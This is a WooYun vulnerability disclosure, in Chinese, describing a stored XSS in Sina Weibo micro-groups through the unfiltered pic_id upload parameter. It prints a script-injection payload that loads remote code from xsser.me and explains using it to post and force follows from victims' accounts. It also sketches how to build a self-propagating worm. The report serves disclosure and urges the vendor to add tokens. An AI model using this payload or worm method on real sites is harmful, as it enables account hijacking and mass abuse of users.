WooYun.org

今天，给大家带来是新浪微群的XSS+发微博+关注
什么东西都准备好了，代码什么的都准备好了，主要就是用了演示一下过程
"/><script src=http://xsser.me/UZH56T></script><img high=0 weight=0
打开神器FID 随便找一个微群测试
随便上传一张图片
发送的同时截包
经过测试，其中的pic_id几乎什么参数都没有过滤，所以说XSS就从这里开始。
我们插入上面的代码
刷新
前面的是闭合前面的图片，后面的<img high=0 weight=0 是为了屏蔽那些暴漏的代码
我们可以看到，这里完全没有过滤，所以我的代码就轻松的插了进去。。。- -||
新浪微博由于有http-only，所以盗了COOKIES也是进不去那个帐号的，改COOKIES浏览会跳回登录页。
所以，今天就来发微博和+关注。
发微博本身是想用weibo.com这里面的接口
后来G大说不同域
所以就找q.weibo.com的接口
经过一轮筛选，我找到了这个接口。- -||
如果用下面的发微博同步的话，就会有未加入微群的限制，而这个，推荐就没什么限制。
感谢G大给的代码。。。。。
我为什么要说加关注和发微博呢，就是想提醒。
TOKEN很重要，加个token又不会怀孕 - -||
我们现在来测试一下。。。
下面坐等新关注。。。
好了，已经有了。
我们看到，关注了我，并且发了微博。。。
果断删掉。。。- -
蠕虫的话，只需要发微博，微博的地址带上这个连接就可以了。。
我觉得用编码一下会更好，。。。
假设这个地址还有XSS。。
JS转义。。
还可以加点别的东西
就这样，我想一个蠕虫就做好了。。。。
伟大的厂商，看在我录视频的份上，20RK吧。。
伟大的XSSER，看在我录视频的份上，劈死我把。。。。
END。。。